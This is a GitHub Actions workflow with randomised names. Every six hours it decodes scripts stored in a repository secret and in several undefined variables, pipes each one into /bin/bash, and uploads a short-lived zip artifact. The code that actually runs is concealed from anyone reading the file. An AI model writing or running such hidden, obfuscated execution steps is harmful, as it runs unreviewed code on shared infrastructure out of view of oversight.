name: shizhongxili
on:
  workflow_dispatch:

  schedule:
    - cron: '57 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shizhongxili
        env:
          uywz08029: ${{ secrets.uywz08029 }}
        run: |
          printf '%s' "$uywz08029" | jq -r .absjy91 | /bin/bash
          printf '%s' "$ujtxe48" | jq -r .kefv95761 | /bin/bash
          echo $ccjg29 | jq -r .m3763 | /bin/bash
          printf '%s' "$dlm631" | jq -r .zwi619 | /bin/bash
          printf '%s' "$a0486" | jq -r .zg42 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: SsDceyYR
          path: "*.zip"
          retention-days: 1
